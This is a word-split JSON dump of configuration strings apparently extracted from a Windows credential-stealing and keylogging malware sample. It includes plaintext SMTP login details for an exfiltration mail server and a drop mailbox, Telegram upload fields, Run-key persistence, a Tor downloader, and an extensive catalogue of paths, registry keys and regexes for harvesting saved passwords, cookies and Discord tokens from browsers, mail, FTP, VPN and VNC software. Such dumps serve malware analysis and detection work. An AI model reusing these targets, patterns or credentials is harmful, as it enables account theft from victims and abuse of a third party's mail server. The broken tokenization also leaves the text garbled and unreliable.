{
``
Protocol
''
:
``
smtp
''
,
``
Host
''
:
``
mail.expostore.pk
''
,
``
Username
''
:
``
info
@
expostore.pk
''
,
``
Password
''
:
``
Expostore12345
@
@
''
,
``
Port
''
:
587
,
``
Strings
''
:
[
``
''
,
``
:
``
,
``
<
b
>
[
``
,
``
<
/b
>
''
,
``
<
b
>
]
<
/b
>
(
``
,
``
)
''
,
``
False
''
,
``
{
BACK
}
''
,
``
{
ALT+TAB
}
''
,
``
{
ALT+F4
}
''
,
``
{
TAB
}
''
,
``
{
ESC
}
''
,
``
{
Win
}
''
,
``
{
CAPSLOCK
}
''
,
``
&
uarr
;
''
,
``
&
darr
;
''
,
``
&
larr
;
''
,
``
&
rarr
;
''
,
``
{
DEL
}
''
,
``
{
END
}
''
,
``
{
HOME
}
''
,
``
{
Insert
}
''
,
``
{
NumLock
}
''
,
``
{
PageDown
}
''
,
``
{
PageUp
}
''
,
``
{
ENTER
}
''
,
``
{
F1
}
''
,
``
{
F2
}
''
,
``
{
F3
}
''
,
``
{
F4
}
''
,
``
{
F5
}
''
,
``
{
F6
}
''
,
``
{
F7
}
''
,
``
{
F8
}
''
,
``
{
F9
}
''
,
``
{
F10
}
''
,
``
{
F11
}
''
,
``
{
F12
}
''
,
``
``
,
``
control
''
,
``
{
CTRL
}
''
,
``
&
''
,
``
&
amp
;
''
,
``
<
``
,
``
&
lt
;
''
,
``
>
''
,
``
&
gt
;
''
,
``
\
''
''
,
``
&
quot
;
''
,
``
Copied
Text
:
``
,
``
The
binary
key
can
not
have
an
odd
number
of
digits
:
{
0
}
''
,
``
Index
must
be
from
{
0
}
to
{
1
}
.
``
,
``
:
Zone.Identifier
''
,
``
SystemDrive
''
,
``
\\
''
,
``
WScript.Shell
''
,
``
RegRead
''
,
``
ObjectLength
''
,
``
ChainingModeGCM
''
,
``
AuthTagLength
''
,
``
ChainingMode
''
,
``
KeyDataBlob
''
,
``
AES
''
,
``
Microsoft
Primitive
Provider
''
,
``
CONNECTION
''
,
``
KEEP-ALIVE
''
,
``
PROXY-AUTHENTICATE
''
,
``
PROXY-AUTHORIZATION
''
,
``
TE
''
,
``
TRAILER
''
,
``
TRANSFER-ENCODING
''
,
``
UPGRADE
''
,
``
g
''
,
``
401\r\n\r\n
''
,
``
502
``
,
``
\r\n\r\n
''
,
``
500
``
,
``
-
''
,
``
Windows
RDP
''
,
``
credential
''
,
``
policy
''
,
``
blob
''
,
``
rdg
''
,
``
chrome
''
,
``
{
{
{
0
}
}
}
''
,
``
Length
''
,
``
CopyTo
''
,
``
ComputeHash
''
,
``
sha512
''
,
``
Copy
''
,
``
Mozilla/5.0
(
Windows
NT
10.0
;
Win64
;
x64
;
rv:80.0
)
Gecko/20100101
Firefox/80.0
''
,
``
20
''
,
``
/
''
,
``
%
discordapi
%
''
,
``
yyyy-MM-dd
HH
:
mm
:
ss
''
,
``
yyyy_MM_dd_HH_mm_ss
''
,
``
<
br
>
''
,
``
<
hr
>
''
,
``
mail.expostore.pk
''
,
``
info
@
expostore.pk
''
,
``
Expostore12345
@
@
''
,
``
mylogs456
@
gmail.com
''
,
``
appdata
''
,
``
ezIxe
''
,
``
ezIxe.exe
''
,
``
http
:
//ZwmKPh.com
''
,
``
\\jwK
''
,
``
2025-10-25
''
,
``
yyyy-MM-dd
''
,
``
Subtract
''
,
``
Days
''
,
``
Software\\Microsoft\\Windows\\CurrentVersion\\Run
''
,
``
\\drivers\\etc\\hosts
''
,
``
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run
''
,
``
SC
''
,
``
SC_
''
,
``
_
''
,
``
.jpeg
''
,
``
Screenshot
''
,
``
image/jpeg
''
,
``
/log.tmp
''
,
``
KL
''
,
``
KL_
''
,
``
.html
''
,
``
<
html
>
''
,
``
<
/html
>
''
,
``
Log
''
,
``
text/html
''
,
``
[
``
,
``
]
''
,
``
,
''
,
``
URL
:
''
,
``
Username
:
''
,
``
Password
:
''
,
``
Application
:
''
,
``
PW
''
,
``
PW_
''
,
``
\u0000
''
,
``
CO
''
,
``
CO_
''
,
``
.zip
''
,
``
Cookie
''
,
``
application/zip
''
,
``
-f
``
,
``
\\Data\\Tor\\torrc
''
,
``
p=
''
,
``
127.0.0.1
''
,
``
POST
''
,
``
+
''
,
``
%
2B
''
,
``
application/x-www-form-urlencoded
''
,
``
image/jpg
''
,
``
STOR
''
,
``
Add
''
,
``
chat_id
''
,
``
caption
''
,
``
yyyy-MM-dd
HH-mm-ss
''
,
``
.jpg
''
,
``
sendDocument
''
,
``
document
''
,
``
html
''
,
``
jpg
''
,
``
zip
''
,
``
--
--
--
--
--
--
--
--
--
--
--
--
--
-
''
,
``
x
''
,
``
\r\n
--
''
,
``
\r\n
''
,
``
multipart/form-data
;
boundary=
''
,
``
Content-Disposition
:
form-data
;
name=\
''
{
0
}
\
''
\r\n\r\n
{
1
}
''
,
``
Content-Disposition
:
form-data
;
name=\
''
{
0
}
\
''
;
filename=\
''
{
1
}
\
''
\r\nContent-Type
:
{
2
}
\r\n\r\n
''
,
``
--
\r\n
''
,
``
Time
:
``
,
``
MM/dd/yyyy
HH
:
mm
:
ss
''
,
``
User
Name
:
``
,
``
Computer
Name
:
``
,
``
OSFullName
:
``
,
``
CPU
:
``
,
``
RAM
:
``
,
``
IP
Address
:
``
,
``
New
``
,
``
Recovered
!
``
,
``
User
Name
''
,
``
OSFullName
''
,
``
None
''
,
``
win32_processor
''
,
``
processorID
''
,
``
d20948d9-d32b-4852-bde5-bdc18a66732c
''
,
``
Win32_NetworkAdapterConfiguration
''
,
``
IPEnabled
''
,
``
MacAddress
''
,
``
:
''
,
``
55068dca-1662-4d4c-9faf-d478d0137dc0
''
,
``
WinMgmts
:
''
,
``
InstancesOf
''
,
``
Win32_BaseBoard
''
,
``
SerialNumber
''
,
``
367271d1-a618-43da-81a8-cdb0d16e81ca
''
,
``
x2
''
,
``
Tor
''
,
``
AUTHENTICATE
\
''
GPhRvgkUsd\
''
''
,
``
SIGNAL
NEWNYM
''
,
``
250
''
,
``
tor
''
,
``
StartInfo
''
,
``
FileName
''
,
``
\\Tor\\tor.exe
''
,
``
Arguments
''
,
``
UseShellExecute
''
,
``
RedirectStandardOutput
''
,
``
CreateNoWindow
''
,
``
Start
''
,
``
StandardOutput
''
,
``
ReadLine
''
,
``
Contains
''
,
``
Bootstrapped
100
%
''
,
``
EndOfStream
''
,
``
Id
''
,
``
AvoidDiskWrites
1\r\nLog
notice
stdout\r\nDormantCanceledByStartup
1\r\nControlPort
9051\r\nCookieAuthentication
1\r\nrunasdaemon
1\r\nExtORPort
auto\r\nhashedcontrolpassword
%
hash
%
\r\nDataDirectory
%
tordir
%
\\Data\\Tor\r\nGeoIPFile
%
tordir
%
\\Data\\Tor\\geoip\r\nGeoIPv6File
%
tordir
%
\\Data\\Tor\\geoip6\r\n
''
,
``
\\tor.zip
''
,
``
%
tordir
%
''
,
``
%
hash
%
''
,
``
GPhRvgkUsd
''
,
``
https
:
//www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
''
,
``
https
:
//www.theonionrouter.com/dist.torproject.org/torbrowser/
''
,
``
<
a.+
?
href\\s
*
=\\s
*
(
[
\
''
'
]
)
(
?
<
href
>
.+
?
)
\\1
[
^
>
]
*
>
''
,
``
href
''
,
``
Replace
''
,
``
TrimStart
''
,
``
.
``
,
``
TrimEnd
''
,
``
tor-win32-
''
,
``
GetBytes
''
,
``
TransformBlock
''
,
``
TransformFinalBlock
''
,
``
Hash
''
,
``
16
:
''
,
``
filename
''
,
``
fileformat
''
,
``
file
''
,
``
username
''
,
``
content
''
,
``
--
--
--
--
--
{
0
:
N
}
''
,
``
--
{
0
}
\r\nContent-Disposition
:
form-data
;
name=\
''
{
1
}
\
''
;
filename=\
''
{
2
}
\
''
\r\nContent-Type
:
{
3
}
\r\n\r\n
''
,
``
application/octet-stream
''
,
``
--
{
0
}
\r\nContent-Disposition
:
form-data
;
name=\
''
{
1
}
\
''
\r\n\r\n
{
2
}
''
,
``
GET
''
,
``
OK
''
,
``
\\tmpG
''
,
``
.tmp
''
,
``
SELECT
*
FROM
Win32_Processor
''
,
``
Name
''
,
``
MB
''
,
``
Unknown
''
,
``
Wr
''
,
``
W
''
,
``
C
''
,
``
ExtractFile
''
,
``
n
''
,
``
http
:
//127.0.0.1
:
''
,
``
HTTP/1.1
``
,
``
Hostname
''
,
``
Port
''
,
``
200
Connection
established\r\nProxy-Agent
:
HToS5x\r\n\r\n
''
,
``
Connect
''
,
``
Host
''
,
``
PathAndQuery
''
,
``
Fragment
''
,
``
\r\nHost
:
``
,
``
{
0
}
''
,
``
Key
''
,
``
Mode
''
,
``
IV
''
,
``
Padding
''
,
``
CreateDecryptor
''
,
``
SEQUENCE
{
``
,
``
{
0
:
X2
}
''
,
``
\tINTEGER
``
,
``
\tOCTETSTRING
``
,
``
\tOBJECTIDENTIFIER
``
,
``
}
''
,
``
sha256
''
,
``
Cookies
''
,
``
Opera
''
,
``
Opera
Software\\Opera
Stable
''
,
``
Comodo
Dragon
''
,
``
Comodo\\Dragon\\User
Data
''
,
``
Chrome
''
,
``
\\Google\\Chrome\\User
Data
''
,
``
360
Browser
''
,
``
\\360Chrome\\Chrome\\User
Data
''
,
``
Yandex
''
,
``
Yandex\\YandexBrowser\\User
Data
''
,
``
SRWare
Iron
''
,
``
Chromium\\User
Data
''
,
``
Torch
Browser
''
,
``
Torch\\User
Data
''
,
``
Brave
Browser
''
,
``
BraveSoftware\\Brave-Browser\\User
Data
''
,
``
Iridium
Browser
''
,
``
\\Iridium\\User
Data
''
,
``
CoolNovo
''
,
``
MapleStudio\\ChromePlus\\User
Data
''
,
``
7Star
''
,
``
7Star\\7Star\\User
Data
''
,
``
Epic
Privacy
Browser
''
,
``
Epic
Privacy
Browser\\User
Data
''
,
``
Amigo
''
,
``
Amigo\\User
Data
''
,
``
CentBrowser
''
,
``
CentBrowser\\User
Data
''
,
``
CocCoc
''
,
``
CocCoc\\Browser\\User
Data
''
,
``
Chedot
''
,
``
Chedot\\User
Data
''
,
``
Elements
Browser
''
,
``
Elements
Browser\\User
Data
''
,
``
Kometa
''
,
``
Kometa\\User
Data
''
,
``
Sleipnir
6
''
,
``
Fenrir
Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer
''
,
``
Citrio
''
,
``
CatalinaGroup\\Citrio\\User
Data
''
,
``
Coowon
''
,
``
Coowon\\Coowon\\User
Data
''
,
``
Liebao
Browser
''
,
``
liebao\\User
Data
''
,
``
QIP
Surf
''
,
``
QIP
Surf\\User
Data
''
,
``
QQ
Browser
''
,
``
Tencent\\QQBrowser\\User
Data
''
,
``
UC
Browser
''
,
``
UCBrowser\\
''
,
``
Orbitum
''
,
``
Orbitum\\User
Data
''
,
``
Sputnik
''
,
``
Sputnik\\Sputnik\\User
Data
''
,
``
uCozMedia
''
,
``
uCozMedia\\Uran\\User
Data
''
,
``
Vivaldi
''
,
``
Vivaldi\\User
Data
''
,
``
cookies.sqlite
''
,
``
Firefox
''
,
``
APPDATA
''
,
``
\\Mozilla\\Firefox\\
''
,
``
IceCat
''
,
``
\\Mozilla\\icecat\\
''
,
``
PaleMoon
''
,
``
\\Moonchild
Productions\\Pale
Moon\\
''
,
``
SeaMonkey
''
,
``
\\Mozilla\\SeaMonkey\\
''
,
``
Flock
''
,
``
\\Flock\\Browser\\
''
,
``
K-Meleon
''
,
``
\\K-Meleon\\
''
,
``
Postbox
''
,
``
\\Postbox\\
''
,
``
Thunderbird
''
,
``
\\Thunderbird\\
''
,
``
IceDragon
''
,
``
\\Comodo\\IceDragon\\
''
,
``
WaterFox
''
,
``
\\Waterfox\\
''
,
``
BlackHawk
''
,
``
\\NETGATE
Technologies\\BlackHawk\\
''
,
``
CyberFox
''
,
``
\\8pecxstudios\\Cyberfox\\
''
,
``
Path=
(
[
A-z0-9\\/\\.\\-
]
+
)
''
,
``
profiles.ini
''
,
``
\\Default\\
''
,
``
Profile
''
,
``
origin_url
''
,
``
username_value
''
,
``
password_value
''
,
``
v10
''
,
``
v11
''
,
``
Opera
Stable
''
,
``
\\Local
State
''
,
``
\
''
encrypted_key\
''
:
\
''
(
.
*
?
)
\
''
''
,
``
\\Default\\Login
Data
''
,
``
\\Login
Data
''
,
``
Opera
Browser
''
,
``
Yandex
Browser
''
,
``
Iridium\\User
Data
''
,
``
Chromium
''
,
``
Cool
Novo
''
,
``
Brave
''
,
``
360Chrome\\Chrome\\User
Data
''
,
``
Uran
''
,
``
Epic
Privacy
''
,
``
Coccoc
''
,
``
\\Google\\Chrome\\User
Data\\
''
,
``
logins
''
,
``
Major
''
,
``
Minor
''
,
``
2F1A6504-0641-44CF-8BB5-3612D865F2E5
''
,
``
Windows
Secure
Note
''
,
``
3CCD5499-87A8-4B10-A215-608888DD3B55
''
,
``
Windows
Web
Password
Credential
''
,
``
154E23D0-C644-4E6F-8CE6-5069272F999F
''
,
``
Windows
Credential
Picker
Protector
''
,
``
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
''
,
``
Web
Credentials
''
,
``
77BC582B-F0A6-4E15-4E80-61736B6F3B29
''
,
``
Windows
Credentials
''
,
``
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
''
,
``
Windows
Domain
Certificate
Credential
''
,
``
3E0E35BE-1B77-43E7-B873-AED901B6275B
''
,
``
Windows
Domain
Password
Credential
''
,
``
3C886FF3-2669-4AA2-A8FB-3F6759A77548
''
,
``
Windows
Extended
Credential
''
,
``
00000000-0000-0000-0000-000000000000
''
,
``
SchemaId
''
,
``
pResourceElement
''
,
``
pIdentityElement
''
,
``
pPackageSid
''
,
``
pAuthenticatorElement
''
,
``
IE/Edge
''
,
``
\\Common
Files\\Apple\\Apple
Application
Support\\plutil.exe
''
,
``
\\Apple
Computer\\Preferences\\keychain.plist
''
,
``
*
''
,
``
Login
Data
''
,
``
journal
''
,
``
wow_logins
''
,
``
\\Microsoft\\Edge\\User
Data
''
,
``
Edge
Chromium
''
,
``
\\Microsoft\\Credentials\\
''
,
``
\\Microsoft\\Protect\\
''
,
``
GuidMasterKey
''
,
``
\\Default\\EncryptedStorage
''
,
``
\\EncryptedStorage
''
,
``
entries
''
,
``
category
''
,
``
Password
''
,
``
str3
''
,
``
str2
''
,
``
blob0
''
,
``
PopPassword
''
,
``
SmtpPassword
''
,
``
Software\\IncrediMail\\Identities\\
''
,
``
\\Accounts_New
''
,
``
EmailAddress
''
,
``
SmtpServer
''
,
``
incredimail
''
,
``
HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine
''
,
``
current
''
,
``
Settings
''
,
``
SavePasswordText
''
,
``
ReturnAddress
''
,
``
Eudora
''
,
``
\\falkon\\profiles\\
''
,
``
startProfile=\
''
(
[
A-z0-9\\/\\
.
]
+
)
\
''
''
,
``
\\browsedata.db
''
,
``
autofill
''
,
``
Falkon
Browser
''
,
``
startProfile=
(
[
A-z0-9\\/\\
.
]
+
)
''
,
``
Backend=
(
[
A-z0-9\\/\\.-
]
+
)
''
,
``
\\settings.ini
''
,
``
\\Claws-mail
''
,
``
\\clawsrc
''
,
``
passkey0
''
,
``
master_passphrase_salt=
(
.+
)
''
,
``
master_passphrase_pbkdf2_rounds=
(
.+
)
''
,
``
use_master_passphrase=
(
.+
)
''
,
``
\\accountrc
''
,
``
smtp_server
''
,
``
address
''
,
``
account
''
,
``
\\passwordstorerc
''
,
``
{
(
.
*
)
,
(
.
*
)
}
(
.
*
)
''
,
``
ClawsMail
''
,
``
signons3.txt
''
,
``
--
-
''
,
``
\r\n.\r\n
''
,
``
objects
''
,
``
Data
''
,
``
DecryptTripleDes
''
,
``
Flock
Browser
''
,
``
ALLUSERSPROFILE
''
,
``
\\\\
''
,
``
DynDNS\\Updater\\config.dyndns
''
,
``
username=
''
,
``
=
''
,
``
password=
''
,
``
&
H
''
,
``
t6KzXhCh
''
,
``
http
:
//DynDns.com
''
,
``
DynDNS
''
,
``
name
''
,
``
jid
''
,
``
password
''
,
``
Psi/Psi+
''
,
``
Software\\OpenVPN-GUI\\configs
''
,
``
Software\\OpenVPN-GUI\\configs\\
''
,
``
auth-data
''
,
``
entropy
''
,
``
Open
VPN
''
,
``
\\FileZilla\\recentservers.xml
''
,
``
<
Server
>
''
,
``
<
Host
>
''
,
``
<
/Host
>
''
,
``
<
Port
>
''
,
``
<
/Port
>
''
,
``
<
User
>
''
,
``
<
/User
>
''
,
``
<
Pass
encoding=\
''
base64\
''
>
''
,
``
<
/Pass
>
''
,
``
<
Pass
>
''
,
``
FileZilla
''
,
``
SOFTWARE\\\\Martin
Prikryl\\\\WinSCP
2\\\\Sessions
''
,
``
HostName
''
,
``
UserName
''
,
``
PublicKeyFile
''
,
``
PortNumber
''
,
``
22
''
,
``
[
PRIVATE
KEY
LOCATION
:
\
''
{
0
}
\
''
]
''
,
``
WinSCP
''
,
``
IP=
''
,
``
port=
''
,
``
user=
''
,
``
pass=
''
,
``
FlashFXP
''
,
``
SOFTWARE\\FTPWare\\COREFTP\\Sites
''
,
``
CoreFTP
''
,
``
User
''
,
``
\\FTP
Navigator\\Ftplist.txt
''
,
``
Server
''
,
``
No
Password
''
,
``
FTP
Navigator
''
,
``
Programfiles
(
x86
)
''
,
``
programfiles
''
,
``
\\jDownloader\\config\\database.script
''
,
``
programfiles
(
x86
)
''
,
``
INSERT
INTO
CONFIG
VALUES
(
'AccountController
'
,
'
''
,
``
sq
''
,
``
t
''
,
``
xt
''
,
``
JDownloader
''
,
``
Software\\Paltalk
''
,
``
HKEY_CURRENT_USER\\Software\\Paltalk\\
''
,
``
pwd
''
,
``
Paltalk
''
,
``
\\.purple\\accounts.xml
''
,
``
<
account
>
''
,
``
<
protocol
>
''
,
``
<
/protocol
>
''
,
``
<
name
>
''
,
``
<
/name
>
''
,
``
<
password
>
''
,
``
<
/password
>
''
,
``
Pidgin
''
,
``
\\SmartFTP\\Client
2.0\\Favorites\\Quick
Connect\\
''
,
``
\\SmartFTP\\Client
2.0\\Favorites\\Quick
Connect\\
*
.xml
''
,
``
<
Password
>
''
,
``
<
/Password
>
''
,
``
<
Name
>
''
,
``
<
/Name
>
''
,
``
SmartFTP
''
,
``
\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini
''
,
``
HOST
''
,
``
UID
''
,
``
PWD
''
,
``
WS_FTP
''
,
``
\\cftp\\Ftplist.txt
''
,
``
;
Server=
''
,
``
;
Port=
''
,
``
;
Password=
''
,
``
;
User=
''
,
``
;
Anonymous=
''
,
``
Name=
''
,
``
FTPCommander
''
,
``
\\FTPGetter\\servers.xml
''
,
``
<
server
>
''
,
``
<
server_ip
>
''
,
``
<
/server_ip
>
''
,
``
<
server_port
>
''
,
``
<
/server_port
>
''
,
``
<
server_user_name
>
''
,
``
<
/server_user_name
>
''
,
``
<
server_user_password
>
''
,
``
<
/server_user_password
>
''
,
``
FTPGetter
''
,
``
HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC
''
,
``
HKEY_CURRENT_USER\\SOFTWARE\\Vitalwerks\\DUC
''
,
``
USERname
''
,
``
NO-IP
''
,
``
\\The
Bat
!
``
,
``
\\Account.CFN
''
,
``
zzz
''
,
``
\u0000\u0000\u0000
''
,
``
TheBat
''
,
``
HKEY_CURRENT_USER\\Software\\RimArts\\B2\\Settings
''
,
``
DataDir
''
,
``
Folder.lst
''
,
``
\\Mailbox.ini
''
,
``
Account
''
,
``
SMTPServer
''
,
``
MailAddress
''
,
``
PassWd
''
,
``
Becky
!
``
,
``
\\Trillian\\users\\global\\accounts.dat
''
,
``
Accounts
''
,
``
Trillian
''
,
``
Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
''
,
``
Software\\Microsoft\\Windows
NT\\CurrentVersion\\Windows
Messaging
Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
''
,
``
Software\\Microsoft\\Windows
Messaging
Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676
''
,
``
Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
''
,
``
Email
''
,
``
IMAP
Password
''
,
``
POP3
Password
''
,
``
HTTP
Password
''
,
``
SMTP
Password
''
,
``
SMTP
Server
''
,
``
Outlook
''
,
``
COMPlus_legacyCorruptedStateExceptionsPolicy
''
,
``
1
''
,
``
Software\\Microsoft\\ActiveSync\\Partners
''
,
``
syncpassword
''
,
``
mailoutgoing
''
,
``
Windows
Mail
App
''
,
``
HKEY_CURRENT_USER\\Software\\Aerofox\\FoxmailPreview
''
,
``
Executable
''
,
``
HKEY_CURRENT_USER\\Software\\Aerofox\\Foxmail\\V3.1
''
,
``
FoxmailPath
''
,
``
\\Storage\\
''
,
``
\\mail\\
''
,
``
\\VirtualStore\\Program
Files\\Foxmail\\mail\\
''
,
``
\\VirtualStore\\Program
Files
(
x86
)
\\Foxmail\\mail\\
''
,
``
\\Accounts\\Account.rec0
''
,
``
\\Account.stg
''
,
``
Read
''
,
``
Close
''
,
``
Dispose
''
,
``
POP3Host
''
,
``
SMTPHost
''
,
``
IncomingServer
''
,
``
POP3Password
''
,
``
Foxmail
''
,
``
\\Opera
Mail\\Opera
Mail\\wand.dat
''
,
``
opera
:
''
,
``
Opera
Mail
''
,
``
\\Pocomail\\accounts.ini
''
,
``
POPPass
''
,
``
SMTPPass
''
,
``
SMTP
''
,
``
PocoMail
''
,
``
RealVNC
4.x
''
,
``
SOFTWARE\\Wow6432Node\\RealVNC\\WinVNC4
''
,
``
RealVNC
3.x
''
,
``
SOFTWARE\\RealVNC\\vncserver
''
,
``
SOFTWARE\\RealVNC\\WinVNC4
''
,
``
Software\\ORL\\WinVNC3
''
,
``
TightVNC
''
,
``
Software\\TightVNC\\Server
''
,
``
PasswordViewOnly
''
,
``
TightVNC
ControlPassword
''
,
``
ControlPassword
''
,
``
TigerVNC
''
,
``
Software\\TigerVNC\\Server
''
,
``
Trim
''
,
``
UltraVNC
''
,
``
ProgramFiles
(
x86
)
''
,
``
\\uvnc
bvba\\UltraVNC\\ultravnc.ini
''
,
``
passwd
''
,
``
passwd2
''
,
``
ProgramFiles
''
,
``
\\UltraVNC\\ultravnc.ini
''
,
``
\r
''
,
``
\n
''
,
``
Substring
''
,
``
eM
Client\\accounts.dat
''
,
``
eM
Client
''
,
``
\
''
Username\
''
:
\
''
''
,
``
\
''
,
''
,
``
\
''
Secret\
''
:
\
''
''
,
``
72905C47-F4FD-4CF7-A489-4E8121A155BD
''
,
``
\
''
ProviderName\
''
:
\
''
''
,
``
\\Mailbird\\Store\\Store.db
''
,
``
Server_Host
''
,
``
Username
''
,
``
EncryptedPassword
''
,
``
Mailbird
''
,
``
SenderIdentities
''
,
``
NordVPN
''
,
``
NordVPN
directory
not
found
!
``
,
``
NordVpn.exe
*
''
,
``
user.config
''
,
``
Load
''
,
``
SelectSingleNode
''
,
``
//setting
[
@
name='Username
'
]
/value
''
,
``
InnerText
''
,
``
//setting
[
@
name='Password
'
]
/value
''
,
``
\\MySQL\\Workbench\\workbench_user_data.dat
''
,
``
\u0002
''
,
``
\u0003
''
,
``
MySQL
Workbench
''
,
``
%
ProgramW6432
%
''
,
``
Private
Internet
Access\\data
''
,
``
\\Private
Internet
Access\\data
''
,
``
\\account.json
''
,
``
.
*
\
''
username\
''
:
\
''
(
.
*
?
)
\
''
''
,
``
.
*
\
''
password\
''
:
\
''
(
.
*
?
)
\
''
''
,
``
Private
Internet
Access
''
,
``
Software\\DownloadManager\\Passwords\\
''
,
``
EncPassword
''
,
``
Internet
Download
Manager
''
,
``
discord.com
''
,
``
Discord
''
,
``
Discord
Token
''
,
``
hdfzpysvpzimorhk
''
,
``
quick.dat
''
,
``
Sites.dat
''
,
``
\\FlashFXP\\
''
,
``
yA36zA48dEhfrvghGRg57h5UlDv3
''
,
``
Type
''
,
``
Value
''
,
``
IterationCount
''
,
``
\\Psi\\profiles
''
,
``
\\Psi+\\profiles
''
,
``
\\accounts.xml
''
,
``
USERPROFILE
''
,
``
\\OpenVPN\\config\\
''
,
``
remote
``
,
``
PWD=
''
,
``
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
''
,
``
5A
''
,
``
71
''
,
``
abcçdefgğhıijklmnoöpqrsştuüvwxyz1234567890_-.~
!
@
#
$
%
^
&
*
(
)
[
{
]
}
\\|
'
;
:
,
<
>
/
?
+=\r\n
``
,
``
o6806642kbM7c5
''
,
``
[
\\w-
]
{
24
}
\\.
[
\\w-
]
{
6
}
\\
.
[
\\w-
]
{
27
}
''
,
``
mfa\\
.
[
\\w-
]
{
84
}
''
,
``
discordcanary
''
,
``
discordptb
''
,
``
Local
Storage\\leveldb
''
,
``
*
.ldb
''
,
``
*
.log
''
,
``
discord
''
,
``
<
array
>
''
,
``
<
dict
>
''
,
``
<
string
>
''
,
``
<
/string
>
''
,
``
<
data
>
''
,
``
<
/data
>
''
,
``
Safari
Browser
''
,
``
-convert
xml1
-s
-o
\
''
''
,
``
\\fixed_keychain.xml\
''
``
,
``
A
''
,
``
10
''
,
``
B
''
,
``
11
''
,
``
12
''
,
``
D
''
,
``
13
''
,
``
E
''
,
``
14
''
,
``
F
''
,
``
15
''
,
``
ABCDEF
''
,
``
(
``
,
``
EndsWith
''
,
``
IndexOf
''
,
``
UNIQUE
''
,
``
table
''
,
``
00061561
''
,
``
Berkelet
DB
''
,
``
00000002
''
,
``
1.85
(
Hash
,
version
2
,
native
byte-order
)
''
,
``
Unknow
database
format
''
,
``
key4.db
''
,
``
metaData
''
,
``
id
''
,
``
item1
''
,
``
item2
''
,
``
nssPrivate
''
,
``
a11
''
,
``
a102
''
,
``
2a864886f70d0209
''
,
``
2a864886f70d010c050103
''
,
``
key3.db
''
,
``
global-salt
''
,
``
Version
''
,
``
password-check
''
,
``
logins.json
''
,
``
\\\
''
(
hostname|encryptedPassword|encryptedUsername
)
\
''
:
\
''
(
.
*
?
)
\
''
''
,
``
oauth
''
,
``
[
^\\u0020-\\u007F
]
''
,
``
signons.sqlite
''
,
``
moz_logins
''
,
``
hostname
''
,
``
encryptedUsername
''
,
``
encryptedPassword
''
,
``
;
''
]
}
